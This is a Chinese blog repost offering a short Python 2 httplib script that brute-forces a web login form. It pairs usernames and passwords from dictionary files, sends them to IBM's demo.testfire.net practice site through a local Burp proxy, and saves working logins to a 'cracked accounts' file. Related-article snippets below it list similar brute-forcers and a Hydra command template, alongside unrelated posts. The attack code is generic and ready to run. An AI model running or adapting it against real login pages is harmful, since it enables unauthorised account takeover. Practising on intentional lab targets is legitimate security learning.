使用 python 的httplib模块爆破 form 表单的简易脚本

最新推荐文章于 2024-11-13 17:26:18 发布
最新推荐文章于 2024-11-13 17:26:18 发布
阅读量112 收藏
点赞数
文章标签: python 操作系统
原文链接:https://segmentfault.com/a/1190000009370390
版权

httplib:

  1. 包含了 httplib爆破 web 的 form 表单的使用方法

  2. httplib 中代理的添加方法

# -*- coding: utf-8 -*-
import urllib
import httplib
import re

headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36",
           "Content-Type": "application/x-www-form-urlencoded",
           "Referer": "http://demo.testfire.net/bank/login.aspx"}
def brute_force(user, password):
    #添加代理
    conn = httplib.HTTPConnection("localhost","8080")  # 代理,本地 burp 监听一个8080端口,目的是查看发包和回包的情况
    data = {'uid': user, 'passw': password,'btnSubmit':'Login'}
    params = urllib.urlencode(data)
    #测试网站为 IBM 的靶机网站
    page = conn.request("POST", "http://demo.testfire.net/bank/login.aspx", params, headers=headers)  # request页面
    response = conn.getresponse()#返回的页面
    status = response.status
    if status==302:
        print '---- find user:', user, ' with password:',password, '-----'+'\n'
        outFile.write(user + ':' + password + '\n')
    else:
        print '----- error user:', user.replace('\n',''), ' with password:',password.replace('\n','') , '-----'
    return


outFile = open('accounts-cracked.txt', 'w')

if __name__ == '__main__':
    with open('user.dic', 'r') as userline:
        y = userline.readlines()
        with open('pass.dic', 'r') as passline:
            b= passline.readlines()
            for u in y:
                for p in b:
                    brute_force(user=u.replace('\n',''),password=p.replace('\n',''))
outFile.close()
with open('accounts-cracked.txt','r') as text:
    list = text.readlines()
    sum=len(list)

if sum>0:
    print "找到",sum,"个账号密码"
else:
    print "All thread OK,maybe not "
weixin_33826609
关注
http请求库(httplib模块)
weixin_30828379的博客
08-19 1478
httplib模块 1、简介   httplib是用于http请求的库。它主要由HTTPMessage,HTTPResponse,HTTPConnection,HTTPSConnection四个类组成。HTTPMessage表示http头部,HTTPResponse表示http响应,HTTPConnection表示http连接,HTTPSConnection表示https连接。HTTPConn...
python 写的http后台弱口令爆破工具
byteway的专栏
12-12 6300
利用python 写的多线程爆破后台用户名+密码(自备字典),比较实用,即使是在信息安全这么重视的今天,还是有人不加验证码或者异常访问限制之类的登陆验证方式,这样就很容易被弱口令爆破工具拿下,(本代码仅限学习实用,禁止进行web攻击,不承担法律责任)
python 实现简单爆破form表单
weixin_33751566的博客
01-03 221
import httplib,urllibimport stringdef rf(): fp=open('1.txt','r') for i in fp: fp1=open('1.txt','r') for j in fp1: if(conn1(i.rstrip(),j.rstrip())): ...
从零开始学安全(三十六)●利用python 爆破form表单
weixin_30835923的博客
03-25 115
import sys import requests from requests.auth import HTTPBasicAuth def Brute_Force_Web(postData): res = requests.post('http://127.0.0.1/vulnerabilities/burtforce/bf_form.php', d...
渗透测试 - Web相关
 RBPi' Blog
03-22 1526
→Password Attacks Kali Word List cd /usr/share/wordlists gunzip rockyou.txt.gz CeWL (Custom Word List Generator) Hydra (parallelized login cracker) hydra -L <username list> -p <password list...
使用 python 的request模块爆破 form 表单简易脚本
weixin_34236497的博客
05-11 400
pythonhttp 中 request模块在web 表单爆破使用方法 request模块中代理的使用方式 request 模块http 中比较全的模块,简单易用,比之前文章中使用httplib,urllib,urllib2都要好用.可以替换为request 的 session 方法. # -*- coding: utf...
python http模块_python--httplib模块使用
weixin_39956022的博客
12-22 379
httplib是一个相对底层的http请求模块,其上有专门的包装模块,如urllib内建模块,goto等第三方模块,但是封装的越高就越不灵 活,比如urllib模块里请求错误时就不会返回结果页的内容,只有头信息,对于某些需要检测错误请求返回值的场景就不适用,所以就得用这个模块了。1、class httplib.HTTPConnection说明:该类用于创建一个http类型的请求链接原型:HTTPC...
python httplib 模块
bingdongguke的专栏
03-16 894
httplibpythonhttp 协议的客户端实现,可以使用模块来与 HTTP 服务器进行交互。httplib的内容不是很多,也比较简单。以下是一个非常简单的例子,使用httplib获取google首页的html: [python] view plaincopy     #coding=gbk       import httplib       conn = httpli
Python httplib模块使用实例
09-22
Python httplib模块Python标准库中的一个用于客户端进行HTTP操作的模块。该模块提供了一种底层的接口,用于构造请求并解析来自服务器的响应。使用httplib模块可以创建HTTP连接,发起请求并处理服务器响应。 在...
使用httplib模块来制作PythonHTTP客户端的方法
12-23
httplibpythonhttp 协议的客户端实现,可以使用模块来与 HTTP 服务器进行交互。httplib的内容不是很多,也比较简单。以下是一个非常简单的例子,使用httplib获取google首页的html:   #coding=gbk import...
python httplib2模块
09-06
Pythonhttplib2模块是一个强大的HTTP客户端库,它在Python编程中被广泛用于处理HTTP请求。这个库的主要优点是它的缓存功能,可以减少网络延迟并提高应用程序性能。httplib2不仅支持HTTP/1.1协议,还包含了对HTTPS...
ks8 本地化部署 F5-TTS
陈锐的技术笔记
11-13 540
此外,F5-TTS 还创新性地引入了推理时的 Sway Sampling 策略,这一策略可以在推理阶段优先处理早期的流步骤,从而提高生成语音与输入文本的对齐效果。在 LibriSpeech-PC 数据集上,该模型的字错误率(WER)达到了2.42,并且在推理时的实时因子(RTF)为0.15,显著优于之前的扩散模型 E2TTS,后者在处理速度和鲁棒性上存在短板。传统的 TTS 模型往往需要进行复杂的持续时间建模、音素对齐和专门的文本编码,这些都增加了合成过程的复杂性。继续TSS的启动,进入pod 输入命令。
自动化爬虫DrissionPage
m0_55297736的博客
11-09 952
自动化爬虫DrissionPage
什么是Python模块化编程
最新发布
大数据实战派
11-13 320
模块化编程是一种编程方法论,它将程序的功能划分为多个独立的模块,每个模块负责程序中的一部分功能。通过这种方式,程序的代码被分割成更小、更易管理的部分,每个模块都可以独立开发、调试和测试,模块之间通过接口进行交互。模块化编程是将一个复杂的程序拆分为多个独立、功能明确的小模块的编程方法。这不仅提高了代码的复用性和可维护性,还促进了团队协作开发,增强了程序的扩展性。在实际开发中,模块化编程让代码结构更加清晰,逻辑更加简洁,为程序的长久维护和扩展打下了坚实的基础。
外星人入侵
weixin_60243362的博客
11-12 1509
外星人入侵项目实践
推荐一款管道数据检索工具:Pipedata-Pro
11-09 413
是一款专为设计石油、天然气、水和蒸汽管道及管道系统的工程师开发的应用程序。该应用程序提供了设计管道系统所需的工程数据,拥有一个全面的管道类型、配件和材料。
python基础算法编程】
weixin_42333261的博客
11-12 492
这个函数使用两个指针,一个从字符串的开头开始,另一个从字符串的结尾开始。否则,函数递归调用自身,传入去掉首尾字符的子字符串。递归是一种直接的方法来计算斐波那契数列,但对于较大的 N 值,它会非常慢,因为它会重复计算相同的子问题。然后,它比较字符串的第一个和最后一个字符是否相等。如果它们不相等,函数返回。函数是一个生成器函数,用于生成从给定序列中选择指定长度的元素的所有排列。可以使用循环从最后一个元素开始,逐个访问每个元素,直到第一个元素。斐波那契数列是一个经典的数学序列,其中每个数字都是前两个数字的和。
Windows Update服务设置回自动启动
sinat_38424109的博客
11-08 157
你需要执行相反的操作,即将Windows更新相关的注册表项恢复到默认状态,重新启用计划任务,并将Windows Update服务设置回自动启动。
11.11 case class
2402_87076449的博客
11-11 236
1,使用case class创建图书信息类Book:包含四个属性:ID,书名,作者,价格,数量。2,创建一个名为BookList的可变List,它只能用来保存Book的实例。3,初始化三本不同的书(注意id不同就是不同的书),加入到BookList中。7,删除指定ID的书。9,遍历图书列表,并打印每本书的详细信息。3.自动重写:toString,equals,hashCode,copy。3.自动重写:toString,equals,hashCode,copy。1.不可变性 创建的对象的属性是不能修改的。
Python httplib模块详解:HTTP请求与响应
"这篇文档主要介绍了Python中的httplib模块,它是Python标准库的一部分,...然而,需要注意的是,Python 3.x中,httplib已被`http.client`模块取代,虽然API基本保持一致,但建议使用模块以获得更好的兼容性和性能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值